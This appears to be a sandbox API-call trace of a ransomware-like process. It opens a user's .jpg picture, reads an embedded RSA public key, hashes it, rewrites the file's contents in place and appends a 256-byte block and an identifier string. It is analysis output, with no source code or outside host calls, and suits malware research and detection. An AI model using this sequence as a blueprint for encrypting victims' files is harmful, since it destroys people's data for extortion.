PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\DvPtakSDSqUBk1s-p5E_.jpg") returned=".jpg" [0190.529] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\DvPtakSDSqUBk1s-p5E_.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\dvptaksdsqubk1s-p5e_.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0190.529] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=84871) returned 1 [0190.529] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0190.534] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x14b61, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.534] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0190.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0190.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.536] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.537] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x14b87, lpOverlapped=0x0) returned 1 [0190.537] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0190.538] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.538] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.538] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0190.538] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0190.539] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0190.539] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0190.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0190.539] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0190.539] GetLastError () returned 0x0 [0190.539] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0190.539] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0190.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0190.539] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0190.539] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0190.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0190.539] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0190.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0190.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14b90) returned 0x2af5168 [0190.540] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0190.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0190.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0190.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0190.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0190.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0190.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3270 [0190.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dd18 [0190.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af32b8 [0190.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dd00 [0190.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dcd0 [0190.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dcb8 [0190.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dce8 [0190.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0190.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0190.541] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0190.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0190.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcd0 | out: hHeap=0x2c0000) returned 1 [0190.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dce8 | out: hHeap=0x2c0000) returned 1 [0190.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcb8 | out: hHeap=0x2c0000) returned 1 [0190.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0190.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dcb8 [0190.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0190.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dce8 [0190.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0190.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0dcd0 [0190.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0190.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0190.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0190.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0190.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0190.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0190.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0190.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0190.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dce8 | out: hHeap=0x2c0000) returned 1 [0190.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0190.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcd0 | out: hHeap=0x2c0000) returned 1 [0190.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0190.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0190.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcb8 | out: hHeap=0x2c0000) returned 1 [0190.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0190.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0190.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0190.543] GetCurrentThreadId () returned 0x5d8 [0190.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0190.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae4f98 [0190.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0190.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0190.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0190.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0190.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0190.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0190.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.544] GetCurrentThreadId () returned 0x5d8 [0190.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0190.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0190.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0190.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0190.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0190.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0190.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0190.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dcb8 [0190.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0190.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0190.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0190.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0190.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0190.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0190.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0190.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0190.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dcd0 [0190.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0190.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0190.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0190.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0190.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0190.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0190.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0190.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dce8 [0190.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0190.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0190.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0190.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ff348 [0190.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0190.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5eb8 [0190.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0190.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0190.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0190.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5ed0 [0190.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0190.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5ee8 [0190.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0190.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5f00 [0190.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ee8 | out: hHeap=0x2c0000) returned 1 [0190.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5ee8 [0190.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ed0 | out: hHeap=0x2c0000) returned 1 [0190.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0190.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0190.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0190.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0190.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0190.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcd0 | out: hHeap=0x2c0000) returned 1 [0190.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dcd0 [0190.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0190.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af3f88 [0190.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcb8 | out: hHeap=0x2c0000) returned 1 [0190.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0190.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f00 | out: hHeap=0x2c0000) returned 1 [0190.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4198 [0190.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0190.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0190.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0190.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0190.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcd0 | out: hHeap=0x2c0000) returned 1 [0190.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af43b0 [0190.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0190.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0190.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0190.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0190.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0190.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0190.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0190.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0190.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4198 | out: hHeap=0x2c0000) returned 1 [0190.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b0 | out: hHeap=0x2c0000) returned 1 [0190.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0190.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ee8 | out: hHeap=0x2c0000) returned 1 [0190.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0190.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5eb8 | out: hHeap=0x2c0000) returned 1 [0190.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0190.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dce8 | out: hHeap=0x2c0000) returned 1 [0190.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff348 | out: hHeap=0x2c0000) returned 1 [0190.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0190.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0190.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0190.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dd00 | out: hHeap=0x2c0000) returned 1 [0190.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af32b8 | out: hHeap=0x2c0000) returned 1 [0190.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0190.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0190.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0190.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0190.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0190.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0190.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0190.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0190.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0190.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0190.556] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x14b82, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x14b82, lpOverlapped=0x0) returned 1 [0190.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0190.557] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x14b87, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.557] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0190.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0190.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0190.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0190.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0190.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0190.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0190.559] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0190.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 